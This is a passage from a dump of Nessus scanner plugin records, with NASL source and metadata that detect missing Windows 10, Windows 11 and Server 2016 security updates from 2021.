The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154997);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\"\n );\n script_xref(name:\"MSKB\", value:\"5007215\");\n script_xref(name:\"MSFT\", value:\"MS21-5007215\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n\n script_name(english:\"KB5007215: Windows 11 Security Updates (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows 11 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows 11 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42276,\n CVE-2021-42279)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42280, CVE-2021-42283,\n CVE-2021-42285)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007215\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5007215 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007215');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n rollup_date:'11_2021',\n os_build:'22000',\n bulletin:bulletin,\n rollup_kb_list:[5007215])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T15:38:21", "description": "The remote Windows host is missing security update 5007189.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. 
An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42284)", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007189: Windows 10 Version 1909 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42288"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007189.NASL", "href": "https://www.tenable.com/plugins/nessus/154989", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154989);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42288\"\n );\n script_xref(name:\"MSKB\", value:\"5007189\");\n script_xref(name:\"MSFT\", value:\"MS21-5007189\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n\n script_name(english:\"KB5007189: Windows 10 Version 1909 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007189.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42275,\n CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42280, CVE-2021-42283,\n CVE-2021-42285)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42284)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007189\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007189.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007189');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'18363',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007189])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:03:46", "description": "The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. 
(CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601315: Windows 10 Version 1909 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601315.NASL", "href": "https://www.tenable.com/plugins/nessus/146326", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146326);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601315\");\n script_xref(name:\"MSFT\", value:\"MS21-4601315\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601315: Windows 10 Version 1909 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. 
An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/topic/february-9-2021-kb4601315-os-build-18363-1377-bdd71d2f-6729-e22a-3150-64324e4ab954\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93fc3ad3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601315.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601315');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601315])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-24T15:40:56", 
"description": "The remote Windows host is missing security update 5007192.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42278, CVE-2021-42280, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007192: Windows 10 Version 1607 and Windows Server 2016 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007192.NASL", "href": "https://www.tenable.com/plugins/nessus/154990", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) 
Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154990);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007192\");\n script_xref(name:\"MSFT\", value:\"MS21-5007192\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007192: Windows 10 Version 1607 and Windows Server 2016 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007192.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A remote code execution vulnerability. 
An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42278, CVE-2021-42280,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007192\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007192.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007192');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n 